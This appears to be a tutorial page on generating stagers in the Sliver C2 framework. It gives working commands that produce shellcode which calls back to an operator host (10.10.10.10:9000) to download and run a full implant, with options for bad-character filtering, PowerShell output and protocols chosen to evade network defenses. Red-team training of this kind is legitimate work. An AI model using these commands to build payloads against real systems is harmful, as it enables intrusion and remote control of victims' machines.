Stagers
Stagers in Sliver (C2) are small pieces of shellcode designed to set up a communication channel between a compromised machine and the C2 server. They are used as the initial payload that, once executed on the target machine, downloads and executes a more substantial implant or payload. Stagers are essential for establishing an initial foothold in a target environment.
What are Stagers?
Stagers are lightweight payloads that create the initial communication link between the compromised endpoint and the C2 server. Their primary function is to download and execute the full implant, allowing the operator to maintain control over the target system. Due to their small size, stagers can be easily injected into vulnerable applications or delivered through various exploit mechanisms.
Setting Up Stagers
To generate a stager in Sliver, use the generate stager command. It produces shellcode that, once deployed on a target machine, establishes a connection with the C2 server.
- Basic Stager Generation (HTTP):

generate stager --arch amd64 --os windows --protocol http --lhost 10.10.10.10 --lport 9000 --save ./custom_stager.bin

This basic command sets up a stager with the following parameters:

- --arch: Specifies the CPU architecture.
- --os: Specifies the operating system.
- --protocol: Sets the staging protocol, such as TCP, HTTP, or HTTPS.
- --lhost: Specifies the listening host IP address.
- --lport: Specifies the listening port.
- --save: Defines the path to save the generated stager.
Key Configuration Options
1. Bad Characters (--badchars):
This option allows you to specify bytes that should be excluded from the stager shellcode. This is particularly useful to avoid null bytes or other characters that might cause issues in certain exploit environments.
generate stager --badchars '00'

2. Output Format (--format):
The stager can be output in various formats to suit different use cases and integration scenarios. Available formats include raw shellcode, bash, C, C#, PowerShell, Python, and more.
generate stager --format ps1

3. Staging Protocol (--protocol):
The staging protocol defines how the stager communicates with the C2 server. Options include TCP, HTTP, and HTTPS. Choosing the right protocol can help evade network defenses and blend in with normal traffic.
generate stager --protocol https

4. Timeout Details:
The --timeout option sets the command timeout in seconds, ensuring that the stager does not hang indefinitely.
